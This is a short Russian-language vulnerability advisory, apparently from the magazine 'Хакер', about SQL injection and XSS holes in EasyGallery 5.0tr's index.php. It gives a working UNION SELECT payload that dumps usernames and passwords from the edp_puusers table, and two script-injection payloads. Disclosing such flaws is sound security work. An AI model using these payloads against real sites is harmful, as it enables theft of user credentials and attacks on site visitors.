Хакер #305. Многошаговые SQL-инъекции
Программа: EasyGallery 5.0tr
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://localhost/PATH/staticpages/easygallery/index.php? page=category&PageSection=0&catid=[SQL]
[SQL]: 1+union+all+select+1,2,3,concat(puUsername,char(54),puPassword),5,6,7,8,9,0,1+from+edp_puusers/*
Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://localhost/PATH/staticpages/easygallery/index.php/[XSS]
[XSS]: >"><ScRiPt>alert("JosS)</ScRiPt>
http://localhost/PATH/staticpages/easygallery/index.php?help=about&q=[XSS]
[XSS]: %22+onmouseover=alert("JosS")+